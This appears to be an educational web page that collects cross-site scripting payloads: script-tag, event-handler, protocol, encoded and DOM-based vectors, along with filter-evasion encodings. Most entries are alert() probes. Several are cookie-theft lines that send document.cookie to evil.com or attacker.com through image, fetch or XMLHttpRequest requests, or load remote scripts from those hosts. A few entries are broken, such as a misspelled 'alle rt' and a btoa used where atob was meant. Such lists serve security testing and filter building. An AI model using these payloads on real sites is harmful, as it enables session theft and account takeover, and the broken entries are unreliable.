XSS Cross-Site Scripting Payload Examples

An educational collection of cross-site scripting (XSS) payloads for security testing and validation

📝 Script tag XSS injection javascript

🟢 simple ⭐⭐

Various script-tag-based cross-site scripting payloads: basic scripts, external sources, case variants and obfuscation techniques

⏱️ 15 min 🏷️ xss, script, injection, security, web

# Script Tag XSS Injection Vectors
# Various script tag based cross-site scripting payloads

# Basic script tag injections
<script>alert('XSS')</script>
<script>alert(1)</script>
<script>alert(document.cookie)</script>
<script>window.location='http://evil.com'</script>
<script>document.location='http://attacker.com'</script>

# Script tag with external source
<script src="http://evil.com/evil.js"></script>
<script src="//attacker.com/malicious.js"></script>
<script src="https://cdnjs.cloudflare.com/ajax/libs/evil/1.0/payload.js"></script>

# Case variations to bypass filters
<ScRiPt>alert('XSS')</sCrIpT>
<SCRIPT>alert(1)</SCRIPT>
<Script>alert(String.fromCharCode(88,83,83))</script>

# Script tag with event handlers
<script/onload="alert(1)"></script>
<script/onerror=alert(1)></script>
<script onload="alert('XSS')">
<script onreadystatechange="alert(1)">

# Script tag with obfuscation
<script>alert(String.fromCharCode(88,83,83))</script>
<script>alert('\x58\x53\x53')</script>
<script>alert('\u0058\u0053\u0053')</script>
<script>eval('\x61\x6C\x65\x72\x74\x28\x31\x29')</script>

# Script tag with HTML encoding
<script>alert(&quot;XSS&quot;)</script>
<script>alert(&apos;XSS&apos;)</script>

# Script tag with Unicode characters
<script>\u0061\u006C\u0065\u0072\u0074(1)</script>
<script>\x61\x6C\x65\x72\x74(1)</script>

# Script tag with mixed content
<script type="text/javascript">alert(1)</script>
<script language="javascript">alert(1)</script>
<script type="text/vbscript">msgbox("XSS")</script>

# img src onerror (image-based XSS, no script tag required)
<img src=x onerror="alert('XSS')">
<img src=x onerror=alert(1)>
<img src="x" onerror="javascript:alert(1)">

# Nested script tags (bypass for filters that strip a single <script> tag)
<<script>alert('XSS');//<</script>
<script><script>alert(1)</script>
</script>

# Script tag with comment bypass
<script>/**/alert(1)/**/</script>
<script>//%0Aalert(1)</script>
<script>//%0D%0Aalert(1)</script>

# Script tag with whitespace variations
<script>alert(1)      </script>
<script>\talert(1)\n</script>
<script>\r\nalert(1)\r\n</script>

# Script tag with HTML comments and CDATA
<script>/*comment*/alert(1)/*comment*/</script>
<script><!--alert(1)--></script>
<script><![CDATA[alert(1)]]></script>

# Script tag with data: and javascript: src
<script src="data:text/javascript,alert(1)"></script>
<script src="javascript:alert(1)"></script>

# Script tag with base tag bypass
<base href="http://evil.com/">
<script src="payload.js"></script>

# Meta tag refresh and set-cookie
<meta http-equiv="refresh" content="0;url=javascript:alert(1)">
<meta http-equiv="set-cookie" content="XSS=<script>alert(1)</script>">

# Script tag with a dynamically created img
<script>document.createElement('img').src='http://evil.com/'+document.cookie</script>

# Iframe src
<iframe src="javascript:alert(1)"></iframe>
<iframe src="data:text/html,<script>alert(1)</script>"></iframe>

# Object data
<object data="javascript:alert(1)"></object>
<object data="data:text/html,<script>alert(1)</script>"></object>

# Embed src
<embed src="javascript:alert(1)"></embed>
<embed src="data:text/html,<script>alert(1)</script>"></embed>

# Link href
<link rel="stylesheet" href="javascript:alert(1)">
<link rel="icon" href="javascript:alert(1)">

# Form formaction
<form><button formaction="javascript:alert(1)">XSS</button></form>
<form><input formaction="javascript:alert(1)" type="submit"></form>

# Details ontoggle
<details open ontoggle="alert(1)"><summary>XSS</summary></details>

# Marquee onstart
<marquee onstart="alert(1)">XSS</marquee>

# Audio and video onerror
<audio src=x onerror="alert(1)"></audio>
<video src=x onerror="alert(1)"></video>
<video><source onerror="alert(1)"></source></video>

# Input, button and select with autofocus/onfocus
<input autofocus onfocus=alert(1)>
<button onfocus="alert(1)" autofocus>
<select onfocus=alert(1) autofocus><option>

# Textarea with autofocus/onfocus
<textarea autofocus onfocus="alert(1)"></textarea>
<textarea onfocus="alert(1)" autofocus>

# Keygen (obsolete element) with autofocus/onfocus
<keygen autofocus onfocus="alert(1)">

# Progress onmouseover
<progress onmouseover="alert(1)"></progress>

# Meter onmouseover
<meter onmouseover="alert(1)" value="1" min="0" max="100">XSS</meter>

# Frame src (deprecated but still works)
<frame src="javascript:alert(1)"></frame>

# Applet code (obsolete element)
<applet code="javascript:alert(1)"></applet>

# Param value
<param name="src" value="javascript:alert(1)">

# Isindex action (obsolete element)
<isindex action="javascript:alert(1)" type="submit">

# Body onload and onunload
<body onload="alert(1)"></body>
<body onunload="alert(1)"></body>

# Frameset with frame src
<frameset><frame src="javascript:alert(1)"></frame></frameset>

# Bgsound src (IE-only element)
<bgsound src="javascript:alert(1)">

# Style @import and url()
<style>@import "javascript:alert(1)";</style>
<style>body{background:url("javascript:alert(1)")}</style>

# Table and td background attribute
<table background="javascript:alert(1)"></table>
<td background="javascript:alert(1)">

# Div and span inline style url()
<div style="background:url(javascript:alert(1))">XSS</div>
<span style="background:url(javascript:alert(1))">XSS</span>

📝 Event handler XSS injection javascript

🟡 intermediate ⭐⭐⭐

Event-handler-based XSS payloads: onerror, onload, onclick, onmouseover, onfocus and other DOM events

⏱️ 20 min 🏷️ xss, event handlers, dom, security, javascript

# Event Handler XSS Injection Vectors
# Event handler based cross-site scripting payloads

# Image onerror event
<img src=x onerror="alert('XSS')">
<img src="x" onerror=alert(1)>
<img src=x onerror="javascript:alert(1)">
<img src=x onerror="alert(String.fromCharCode(88,83,83))">
<img src=x onerror="document.location='http://evil.com'">

# Body onload event
<body onload=alert('XSS')></body>
<body onload="alert(1)">
<body onload="javascript:alert('XSS')">
<body onunload="alert(1)"></body>

# Anchor onclick event
<a href="#" onclick="alert('XSS')">Click me</a>
<a href="javascript:void(0)" onclick="alert(1)">Click</a>
<a onclick="alert(1)">XSS</a>
<a href=# onclick="alert(1)">Click</a>

# Div mouse events
<div onmouseover="alert('XSS')">Hover me</div>
<div onmouseout="alert(1)">Mouse out</div>
<div onmouseenter="alert('XSS')">Enter</div>
<div onmouseleave="alert('XSS')">Leave</div>
<div onmousemove="alert(1)">Move mouse</div>
<div onmousedown="alert('XSS')">Down</div>
<div onmouseup="alert('XSS')">Up</div>

# Input focus events
<input onfocus=alert(1) autofocus>
<input type="text" onfocus="alert('XSS')" autofocus>
<input type="password" onfocus="alert(1)" autofocus>
<input type="search" onfocus="alert('XSS')" autofocus>

# SVG events
<svg onload=alert(1)>
<svg onload="alert('XSS')">
<svg onmouseover="alert(1)">
<svg onmouseenter="alert('XSS')">
<svg xmlns="http://www.w3.org/2000/svg" onload="alert(1)">

# Iframe events
<iframe onload=alert('XSS')></iframe>
<iframe onload="alert(1)"></iframe>
<iframe src="javascript:alert(1)"></iframe>
<iframe src="#" onload="alert(1)"></iframe>

# Details and summary toggle
<details open ontoggle=alert('XSS')>Details</details>
<details open ontoggle="alert(1)">
<details ontoggle="alert('XSS')">Click to open</details>

# Form events
<form onsubmit="alert('XSS')">
<input type="submit" formaction="javascript:alert(1)">
<button formaction="javascript:alert(1)">Submit</button>
<form onreset="alert(1)">
<button onfocus="alert(1)" autofocus>

# Key events
<input onkeydown="alert('XSS')">
<input onkeypress="alert(1)">
<input onkeyup="alert('XSS')">
<textarea onkeydown="alert(1)"></textarea>
<textarea onkeypress="alert('XSS')"></textarea>

# Mouse events on various elements
<b onmouseover="alert('XSS')">Bold</b>
<i onclick="alert(1)">Italic</i>
<u ondblclick="alert('XSS')">Underline</u>
<p oncontextmenu="alert(1)">Paragraph</p>
<h1 onclick="alert('XSS')">Heading</h1>

# Window events
<window onload="alert(1)">
<html onload="alert('XSS')">
<main onload="alert('XSS')">

# Table events
<table onmouseover="alert('XSS')"><tr><td>Cell</td></tr></table>
<tr onclick="alert(1)"><td>Click</td></tr>
<td ondblclick="alert('XSS')">Double click</td>
<th onmouseenter="alert('XSS')">Header</th>

# List events
<ul onclick="alert('XSS')"><li>Item</li></ul>
<ol onmouseover="alert(1)"><li>Item</li></ol>
<li onclick="alert('XSS')">List item</li>

# Selection and change events
<input onchange="alert('XSS')">
<select onchange="alert(1)"><option>1</option></select>
<textarea onselect="alert('XSS')">Select text</textarea>

# Scroll events
<div onscroll="alert('XSS')" style="height:100px;overflow:scroll">Scroll me<br><br><br><br><br><br><br><br><br></div>
<body onscroll="alert(1)">

# Drag and drop events
<div draggable="true" ondragstart="alert('XSS')">Drag me</div>
<div ondragover="alert(1)">Drop zone</div>
<div ondrop="alert('XSS')">Drop here</div>

# Clipboard events
<input oncopy="alert('XSS')">
<input oncut="alert(1)">
<input onpaste="alert('XSS')">

# Media events
<audio onloadeddata="alert('XSS')"><source src="x"></audio>
<video onplay="alert(1)"><source src="x"></video>
<video onended="alert('XSS')"></video>

# Animation events
<div style="animation:x 5s" onanimationstart="alert('XSS')">Animated</div>
<div onanimationend="alert(1)">Animation end</div>

# Transition events
<div style="transition:all 2s" ontransitionend="alert('XSS')">Transition</div>

# Touch events
<div ontouchstart="alert('XSS')">Touch start</div>
<div ontouchend="alert(1)">Touch end</div>
<div ontouchmove="alert('XSS')">Touch move</div>

# Focus and blur events
<input onblur="alert('XSS')" autofocus>
<select onfocus="alert(1)" autofocus>
<textarea onblur="alert('XSS')"></textarea>

# Error events on various elements
<img src=x onerror="alert('XSS')">
<link rel="stylesheet" href="x" onerror="alert(1)">
<script src="x" onerror="alert('XSS')"></script>

# Ready state changes
<script onreadystatechange="alert('XSS')"></script>

# Data events
<object ondataavailable="alert('XSS')"></object>

# Input events
<input oninput="alert('XSS')">
<textarea oninput="alert(1)"></textarea>

# Invalid events
<input oninvalid="alert('XSS')" required>
<form oninvalid="alert(1)">

# Search events
<input type="search" onsearch="alert('XSS')">

# Time events
<input type="time" ontimeupdate="alert('XSS')">

# Progress events
<progress onprogress="alert('XSS')"></progress>

# Abort events
<img src=x onabort="alert('XSS')">

# Can play events
<video oncanplay="alert('XSS')"></video>

# Duration change events
<audio ondurationchange="alert(1)"></audio>

# Emptied events
<video onemptied="alert('XSS')"></video>

# Stalled events
<audio onstalled="alert('XSS')"></audio>

# Suspend events
<video onsuspend="alert('XSS')"></video>

# Volume change events
<audio onvolumechange="alert(1)"></audio>

# Waiting events
<video onwaiting="alert('XSS')"></video>

# Loaded events
<img onload="alert('XSS')">
<script onload="alert(1)"></script>

# Mouse wheel events
<div onwheel="alert('XSS')">Scroll wheel</div>

# Pointer events
<div onpointerdown="alert('XSS')">Pointer down</div>
<div onpointerup="alert(1)">Pointer up</div>
<div onpointerenter="alert('XSS')">Pointer enter</div>
<div onpointerleave="alert('XSS')">Pointer leave</div>
<div onpointermove="alert('XSS')">Pointer move</div>
<div onpointerover="alert('XSS')">Pointer over</div>
<div onpointerout="alert('XSS')">Pointer out</div>

# Fullscreen events
<div onfullscreenchange="alert('XSS')">Fullscreen change</div>
<div onfullscreenerror="alert(1)">Fullscreen error</div>

📝 Protocol XSS injection javascript

🟡 intermediate ⭐⭐⭐

Protocol-based XSS: javascript:, data:, vbscript: and other protocol injections

⏱️ 25 min 🏷️ xss, protocol, javascript, data, security

# JavaScript Protocol XSS Injection Vectors
# Protocol-based cross-site scripting payloads

# Basic javascript protocol
javascript:alert('XSS')
javascript:alert(1)
javascript:alert(document.cookie)
javascript:window.location='http://evil.com'
javascript:document.location='http://attacker.com'

# JavaScript protocol in anchor tags
<a href="javascript:alert(1)">Click</a>
<a href="javascript:alert('XSS')">XSS</a>
<a href="javascript:window.location='http://evil.com'">Evil</a>
<a href="javascript:document.cookie">Cookie</a>

# JavaScript protocol in image tags
<img src="javascript:alert(1)">
<img src="javascript:alert('XSS')">
<img src="javascript:document.location='http://evil.com'">

# JavaScript protocol in iframe
<iframe src="javascript:alert(1)"></iframe>
<iframe src="javascript:alert('XSS')"></iframe>
<iframe src="javascript:document.location='http://evil.com'"></iframe>

# JavaScript protocol in form action
<form action="javascript:alert(1)">
<button formaction="javascript:alert('XSS')">Submit</button>
<form action="javascript:document.location='http://evil.com'">

# JavaScript protocol in input
<input type="image" src="javascript:alert(1)">
<input type="image" formaction="javascript:alert('XSS')">

# JavaScript protocol in button
<button formaction="javascript:alert(1)">XSS</button>
<button formaction="javascript:alert('XSS')">Click</button>

# JavaScript protocol with obfuscation
javascript:\u0061\u006C\u0065\u0072\u0074(1)
javascript:\x61\x6C\x65\x72\x74(1)
javascript:eval(String.fromCharCode(97,108,101,114,116,40,49,41))

# JavaScript protocol with encoding
javascript:&alert(1);
javascript:%61%6C%65%72%74(1)
javascript:\u0061\u006C\u0065\u0072\u0074(1)
javascript:alert%28%27XSS%27%29

# JavaScript protocol with whitespace
javascript:   alert(1)
javascript:\talert('XSS')
javascript:\nalert(1)
javascript:\r\nalert('XSS')

# JavaScript protocol with comments
javascript://%0Aalert(1)
javascript://%0D%0Aalert('XSS')
javascript:/*comment*/alert(1)/*comment*/

# JavaScript protocol with multiple statements
javascript:alert(1);alert(2);alert(3)
javascript:a=1;b=2;alert(a+b)
javascript:if(1){alert('XSS')}else{alert(2)}

# JavaScript protocol with DOM manipulation
javascript:document.body.innerHTML='<h1>XSS</h1>'
javascript:document.write('<script>alert(1)</script>')
javascript:document.createElement('img').src='http://evil.com/'+document.cookie

# JavaScript protocol with location manipulation
javascript:window.location='http://evil.com'
javascript:location.href='http://attacker.com'
javascript:document.location='javascript:alert(1)'

# JavaScript protocol with cookie theft
javascript:window.location='http://evil.com/'+document.cookie
javascript:location='http://attacker.com/?c='+document.cookie
javascript:new Image().src='http://evil.com/?'+document.cookie

# JavaScript protocol with form submission
javascript:document.forms[0].action='http://evil.com'
javascript:document.forms[0].submit()

# JavaScript protocol with XMLHttpRequest
javascript:x=new XMLHttpRequest();x.open('GET','http://evil.com/?'+document.cookie);x.send()

# JavaScript protocol with fetch
javascript:fetch('http://evil.com/?'+document.cookie)

# JavaScript protocol in object tag
<object data="javascript:alert(1)"></object>
<object data="javascript:alert('XSS')"></object>

# JavaScript protocol in embed tag
<embed src="javascript:alert(1)"></embed>
<embed src="javascript:alert('XSS')"></embed>

# JavaScript protocol in link tag
<link rel="stylesheet" href="javascript:alert(1)">
<link rel="icon" href="javascript:alert('XSS')">

# JavaScript protocol in area tag
<area href="javascript:alert(1)">Map</area>
<area href="javascript:alert('XSS')">Click</area>

# JavaScript protocol in base tag
<base href="javascript:alert(1)">

# JavaScript protocol in meta refresh
<meta http-equiv="refresh" content="0;url=javascript:alert(1)">

# VBScript protocol (IE only)
vbscript:msgbox("XSS")
vbscript:alert(1)
vbscript:document.location='http://evil.com'

# Data protocol with script
data:text/html,<script>alert(1)</script>
data:text/html,<script>alert('XSS')</script>
data:text/html,<h1 onclick=alert(1)>Click</h1>

# Data protocol with HTML encoding
data:text/html,%3Cscript%3Ealert(1)%3C/script%3E
data:text/html,%3Cscript%3Ealert('XSS')%3C/script%3E

# Data protocol in iframe
<iframe src="data:text/html,<script>alert(1)</script>"></iframe>
<iframe src="data:text/html,<script>alert('XSS')</script>"></iframe>

# Data protocol in object
<object data="data:text/html,<script>alert(1)</script>"></object>
<object data="data:text/html,<script>alert('XSS')</script>"></object>

# Data protocol in embed
<embed src="data:text/html,<script>alert(1)</script>"></embed>

# Data protocol with base64
data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==
data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4=

# About protocol
about:blank
about:<script>alert(1)</script>

# Chrome protocol
chrome://chrome/content/browser.xul?<script>alert(1)</script>

# Safari protocol
safari://javascript:alert(1)

# Opera protocol
opera://javascript:alert('XSS')

# File protocol
file:///javascript:alert(1)

# View-source protocol
view-source:javascript:alert(1)

# Python protocol (rare)
python:alert(1)

# Lua protocol (rare)
lua:alert('XSS')

# LiveScript protocol (rare)
livescript:alert(1)

# JavaScript protocol in SVG
<svg><a xlink:href="javascript:alert(1)"><text>Click</text></a></svg>

# JavaScript protocol in mathml
<math><a xlink:href="javascript:alert('XSS')"><text>Click</text></a></math>

# JavaScript protocol with event handler
javascript:void(document.onload=function(){alert(1)})

# JavaScript protocol with eval
javascript:eval('alert(1)')
javascript:eval(String.fromCharCode(97,108,101,114,116,40,49,41))

# JavaScript protocol with setTimeout
javascript:setTimeout('alert(1)',0)
javascript:setTimeout('alert("XSS")',1000)

# JavaScript protocol with setInterval
javascript:setInterval('alert(1)',1000)
javascript:setInterval('alert("XSS")',2000)

# JavaScript protocol with Function constructor
javascript:new Function('alert(1)')()
javascript:(new Function('alert("XSS")'))()

# JavaScript protocol with atob
javascript:eval(atob('YWxlcnQoMSk='))

# JavaScript protocol with btoa
javascript:eval(btoa('YWxlcnQoMSk='))

# JavaScript protocol in style tag (expression IE)
<style>body{background:url("javascript:alert(1)")}</style>
<style>body{background:expression(alert('XSS'))}</style>

# JavaScript protocol in table background
<table background="javascript:alert(1)"></table>
<td background="javascript:alert('XSS')">Cell</td>

# JavaScript protocol with XML namespace
<html xmlns:xul><xul:script src="javascript:alert(1)"/></html>

# JavaScript protocol with XSLT
<?xml-stylesheet type="text/xsl" href="javascript:alert(1)"?>

📝 Encoded XSS payloads javascript

🔴 complex ⭐⭐⭐⭐

XSS payloads using various encoding techniques: URL encoding, HTML entities, Unicode, Base64 and mixed encodings

⏱️ 30 min 🏷️ xss, encoding, obfuscation, security, evasion

# Encoded XSS Injection Vectors
# Various encoding techniques to bypass XSS filters

# URL encoding
%3Cscript%3Ealert('XSS')%3C/script%3E
%3Cscript%3Ealert(1)%3C/script%3E
%3Cimg%20src%3Dx%20onerror%3Dalert(1)%3E
%3Cimg%20src=x%20onerror=alert('XSS')%3E
%3Ciframe%20src%3Djavascript:alert(1)%3E%3C/iframe%3E

# Double URL encoding
%253Cscript%253Ealert(1)%253C/script%253E
%253Cimg%2520src%253Dx%2520onerror%253Dalert(1)%253E
%253Cscript%253Ealert('XSS')%253C/script%253E

# HTML entity encoding
&lt;script&gt;alert('XSS')&lt;/script&gt;
&lt;script&gt;alert(1)&lt;/script&gt;
&lt;img src=x onerror=alert(1)&gt;
&lt;iframe src=javascript:alert(1)&gt;&lt;/iframe&gt;
&lt;div onmouseover=alert('XSS')&gt;Hover&lt;/div&gt;

# Decimal HTML entity encoding
&#60;script&#62;alert(1)&#60;/script&#62;
&#60;img src=x onerror=alert('XSS')&#62;
&#60;div onmouseover=&#34;alert(1)&#34;&#62;Hover&#60;/div&#62;

# Hexadecimal HTML entity encoding
&#x3C;script&#x3E;alert('XSS')&#x3C;/script&#x3E;
&#x3C;img src=x onerror=alert(1)&#x3E;
&#x3C;iframe src=javascript:alert(1)&#x3E;&#x3C;/iframe&#x3E;

# Mixed HTML entity encoding
&#60;script&#x3E;alert(1)&#60;/script&#62;
&#x3C;img&#62;src=x onerror=alert('XSS')&#60;/img&#62;

# Unicode escape sequences
\u003Cscript\u003Ealert(1)\u003C/script\u003E
\u003Cimg src=x onerror=alert('XSS')\u003E
\u003Cdiv onmouseover=\u0022alert(1)\u0022\u003EHover\u003C/div\u003E

# Hexadecimal escape sequences
\x3Cscript\x3Ealert('XSS')\x3C/script\x3E
\x3Cimg src=x onerror=alert(1)\x3E
\x3Ciframe src=javascript:alert(1)\x3E\x3C/iframe\x3E

# Octal escape sequences
\074script\076alert(1)\074/script\076
\074img src=x onerror=alert('XSS')\074

# Base64 encoding
PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==
PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4=
PGltZyBzcmM9eCBvbmVycm9yPWFsZXJ0KDEpPg==
PGlmcmFtZSBzcmM9amF2YXNjcmlwdDphbGVydCgxKT48L2lmcmFtZT4=

# Mixed encoding combinations
%26%23x3C%3Bscript%26%23x3E%3Balert(1)%26%23x3C%3B/script%26%23x3E%3B
%26lt%3Bscript%26gt%3Balert('XSS')%26lt%3B/script%26gt%3B
\u003Cimg src=x onerror=\u0022alert(1)\u0022\u003E

# UTF-7 encoding (deprecated but works in some cases)
+ADw-script+AD4-alert(1)+ADw-/script+AD4-
+ADw-img src=x onerror=alert('XSS')+AD4-

# UTF-16 encoding
%\u003c\u0073\u0063\u0072\u0069\u0070\u0074\u003ealert(1)\u003c\u002f\u0073\u0063\u0072\u0069\u0070\u0074\u003e

# CSS expression encoding (IE)
expression(alle rt(1))
expression(alert('XSS'))
expre/*comment*/ssion(onerror=alert(1))

# JavaScript String encoding
alert(String.fromCharCode(88,83,83))
eval(String.fromCharCode(97,108,101,114,116,40,49,41))
document.write(String.fromCharCode(60,115,99,114,105,112,116,62,97,108,101,114,116,40,49,41,60,47,115,99,114,105,112,116,62))

# JavaScript hex encoding
alert(\x58\x53\x53)
eval(\x61\x6C\x65\x72\x74\x28\x31\x29)
document.write(\x3Cscript\x3Ealert(1)\x3C/script\x3E)

# JavaScript octal encoding
alert(\130\123\123)
eval(\141\154\145\162\164\50\61\51)

# JavaScript unicode encoding
alert(\u0058\u0053\u0053)
eval(\u0061\u006C\u0065\u0072\u0074\u0028\u0031\u0029)

# Mixed character encoding
\u003cimg src=x onerror=\x22alert(1)\x22\u003e
&#60;script&#x3E;alert(String.fromCharCode(88,83,83))&#60;/script&#62;
%3Cscript%3Eeval(\x61\x6C\x65\x72\x74\x28\x31\x29)%3C/script%3E

# Overlong encoding
%e0%80%bcscript%e0%80%bealert(1)%e0%80%bc/script%e0%80%be
%c0%bcscript%c0%bealert('XSS')%c0%bc/script%c0%be

# Percent encoding with null bytes
%00%3Cscript%3Ealert(1)%3C/script%3E
%00%3Cimg%20src=x%20onerror=alert('XSS')%3E

# Slash escaping
\/script\/
\/\u0069\u006d\u0067\u0020\u0073\u0072\u0063\u003d\u0078\u0020\u006f\u006e\u0065\u0072\u0072\u006f\u0072\u003d\u0061\u006c\u0065\u0072\u0074\u0028\u0031\u0029\/

# Backtick escaping
`<script>alert(1)</script>`
`<img src=x onerror=alert('XSS')>`

# Quote variations
<script>alert("XSS")</script>
<script>alert('XSS')</script>
<script>alert(`XSS`)</script>
<img src=x onerror="alert(1)">
<img src=x onerror='alert(1)'>
<img src=x onerror=`alert(1)`>

# EOL encoding (end of line)
<script>alert(1)
</script>
<script>alert('XSS')&#13;</script>

# Tab and newline in tags
<img	src=x	onerror=alert(1)>
<img
src
=
x
onerror
=
alert('XSS')
>

# Zero-width characters
<script>\u200Balert(1)</script>
<img src=x onerror=\u200Balert('XSS')>
<div onmouseover=\u200Calert(1)>Hover</div>

# Right-to-left override
<script>\u202Ealert(1)</script>
<div onmouseover=\u202Ealert('XSS')>Hover</div>

# Non-breaking space
<img\u00A0src=x\u00A0onerror=alert(1)>
<script\u00A0type="text/javascript">\u00A0alert('XSS')</script>

# Soft hyphen
<img\u00ADsrc=x\u00ADonerror=alert(1)>
<script\u00AD>alert(1)</script>

# Encoding in protocol
javascript:\u0061\u006C\u0065\u0072\u0074(1)
javascript:%61%6C%65%72%74('XSS')
javascript:\x61\x6C\x65\x72\x74(1)

# CSS encoding
<div style="background:url(javascript:alert(1))">XSS</div>
<div style="background:url(&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#49;&#41;)">Hover</div>
<div style="background:expression(alert('XSS'))">Test</div>

# Data URL encoding
data:text/html,%3Cscript%3Ealert(1)%3C/script%3E
data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4=
data:text/plain,%3Cscript%3Ealert('XSS')%3C/script%3E

# SVG encoding
<svg><script>alert(1)</script></svg>
<svg><script>&alert('XSS')</script></svg>
<svg onload=alert(1)>
<svg onerror=alert('XSS')>

# MathML encoding
<math><script>alert(1)</script></math>
<math><maction actiontype="statusline#http://evil.com" xlink:href="javascript:alert('XSS')">Click</maction></math>

# XSLT encoding
<?xml version="1.0"?>
<?xml-stylesheet type="text/xsl" href="javascript:alert(1)"?>
<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
<xsl:template match="/">
<script>alert('XSS')</script>
</xsl:template>
</xsl:stylesheet>

📝 DOM-based XSS payloads javascript

🔴 complex ⭐⭐⭐⭐⭐

DOM-based XSS vectors that manipulate the DOM: innerHTML, outerHTML, eval, setTimeout, createElement and location manipulation

⏱️ 35 min 🏷️ xss, dom, client-side, security, javascript

# DOM-based XSS Injection Vectors
# DOM-based cross-site scripting payloads that manipulate the DOM

# Image onerror with document.write
<img src=x onerror="document.write('<script>alert(1)</script>')">
<img src=x onerror="document.write('<img src=x onerror=alert(\'XSS\')>')">

# Div with eval
<div onclick="eval('alert(1)')">Click</div>
<div onmouseover="eval('alert(\'XSS\')')">Hover</div>
<div onclick="eval(String.fromCharCode(97,108,101,114,116,40,49,41))">Click</div>

# Anchor with location manipulation
<a href="#" onclick="location='javascript:alert(1)'">XSS</a>
<a href="#" onclick="window.location='javascript:alert(\'XSS\')'">Click</a>
<a href="javascript:void(0)" onclick="location.href='javascript:alert(1)'">Evil</a>

# Form with action manipulation
<form action="javascript:alert(1)">
<input type="submit" onclick="this.form.action='javascript:alert(\'XSS\')'">
<button onclick="this.form.action='javascript:alert(1)'">Submit</button>

# Input with innerHTML
<input onfocus="this.innerHTML='<img src=x onerror=alert(1)>'" autofocus>
<input onfocus="this.outerHTML='<script>alert(\'XSS\')</script>'" autofocus>

# Textarea with innerHTML
<textarea onfocus="this.innerHTML='<img src=x onerror=alert(1)>'" autofocus></textarea>
<textarea onfocus="this.outerHTML='<script>alert(\'XSS\')</script>'" autofocus></textarea>

# Div with createElement
<div onclick="var img=document.createElement(\'img\');img.src=\'x\';img.onerror=alert(1);document.body.appendChild(img)">Click</div>
<div onmouseover="var script=document.createElement(\'script\');script.src=\'http://evil.com/evil.js\';document.body.appendChild(script)">Hover</div>

# Script with setTimeout
<script>setTimeout("alert('XSS')", 100)</script>
<script>setTimeout("alert(1)", 1000)</script>
<script>setTimeout('document.write(\'<script>alert(1)</script>\')', 500)</script>

# Script with setInterval
<script>setInterval("alert('XSS')", 5000)</script>
<script>setInterval('alert(1)', 10000)</script>

# Script with Function constructor
<script>new Function("alert('XSS')")()</script>
<script>(new Function('alert(1)'))()</script>
<script>Function('alert(\'XSS\')')()</script>

# Location hash based XSS
<a href="#<script>alert(1)</script>">Click</a>
<a href="#<img src=x onerror=alert('XSS')>">Hash</a>
<script>eval(location.hash.substring(1))</script>

# Location search based XSS
<a href="?<script>alert(1)</script>">Click</a>
<a href="?<img src=x onerror=alert('XSS')>">Query</a>
<script>eval(location.search.substring(1))</script>

# Document.referrer based XSS
<script>eval(document.referrer)</script>
<img src=x onerror="eval(document.referrer)">

# Document.URL based XSS
<script>eval(document.URL)</script>
<div onmouseover="eval(document.URL)">Hover</div>

# Document.baseURI based XSS
<script>eval(document.baseURI)</script>
<img src=x onerror="eval(document.baseURI)">

# Window.name based XSS
<iframe src="#" name="<script>alert(1)</script>"></iframe>
<script>eval(window.name)</script>

# PostMessage based XSS
<script>window.onmessage=function(e){eval(e.data)}</script>
<iframe src="javascript:parent.postMessage('<script>alert(1)</script>','*')"></iframe>

# LocalStorage based XSS
<script>eval(localStorage.getItem('xss'))</script>
<script>eval(sessionStorage.getItem('payload'))</script>

# Cookie based XSS
<script>eval(document.cookie)</script>
<img src=x onerror="eval(document.cookie)">

# DOMParser based XSS
<script>var parser=new DOMParser();var doc=parser.parseFromString('<script>alert(1)</script>','text/html');</script>
<script>var xml='<script>alert(\'XSS\')</script>';var parser=new DOMParser();var doc=parser.parseFromString(xml,'text/html');</script>

# Template literal based XSS
<script>`${alert(1)}`</script>
<div onclick="`${alert(\'XSS\')}`">Click</div>
<img src=x onerror="`${alert(1)}`">

# Assign operations
<script>location.assign('javascript:alert(1)')</script>
<script>location.replace('javascript:alert(\'XSS\')')</script>

# History manipulation
<script>history.pushState(null,null,'javascript:alert(1)')</script>
<script>history.replaceState(null,null,'javascript:alert(\'XSS\')')</script>

# Open with DOM payload
<script>window.open('javascript:alert(1)')</script>
<script>window.open('javascript:alert("XSS")')</script>

# Document domain manipulation
<script>document.domain='evil.com'</script>
<script>document.domain='attacker.com';alert(1)</script>

# Parent frame access
<script>parent.document.body.innerHTML='<script>alert(1)</script>'</script>
<script>top.document.write('<img src=x onerror=alert(\'XSS\')>')</script>

# OPENER access (from popup)
<script>opener.document.write('<script>alert(1)</script>')</script>
<script>window.opener.location='javascript:alert(\'XSS\')'</script>

# Frameset access
<script>frames[0].document.write('<script>alert(1)</script>')</script>
<script>parent.frames[0].location='javascript:alert(\'XSS\')'</script>

# Content window access
<iframe src="#" id="xss"></iframe>
<script>document.getElementById('xss').contentWindow.location='javascript:alert(1)'</script>

# Srcdoc manipulation
<iframe srcdoc="<script>alert(1)</script>"></iframe>
<iframe srcdoc="<img src=x onerror=alert('XSS')">"></iframe>

# Data attribute access
<div data-xss="<script>alert(1)</script>"></div>
<script>eval(document.querySelector('[data-xss]').dataset.xss)</script>

# Custom attribute access
<div xss="<img src=x onerror=alert('XSS')>"></div>
<script>eval(document.querySelector('[xss]').getAttribute('xss'))</script>

# getElementsByTagName manipulation
<script>document.getElementsByTagName('body')[0].innerHTML='<script>alert(1)</script>'</script>
<script>document.getElementsByTagName('div')[0].outerHTML='<img src=x onerror=alert(\'XSS\')>'</script>

# getElementsByClassName manipulation
<script>document.getElementsByClassName('test')[0].innerHTML='<script>alert(1)</script>'</script>

# QuerySelector manipulation
<script>document.querySelector('.test').innerHTML='<img src=x onerror=alert(\'XSS\')>'</script>
<script>document.querySelectorAll('div')[0].outerHTML='<script>alert(1)</script>'</script>

# outerHTML replacement
<div onmouseover="this.outerHTML='<img src=x onerror=alert(1)>'">Hover</div>
<button onclick="this.outerHTML='<script>alert(\'XSS\')</script>'">Click</button>

# insertAdjacentHTML
<div onmouseover="this.insertAdjacentHTML('afterbegin','<img src=x onerror=alert(1)>')">Hover</div>
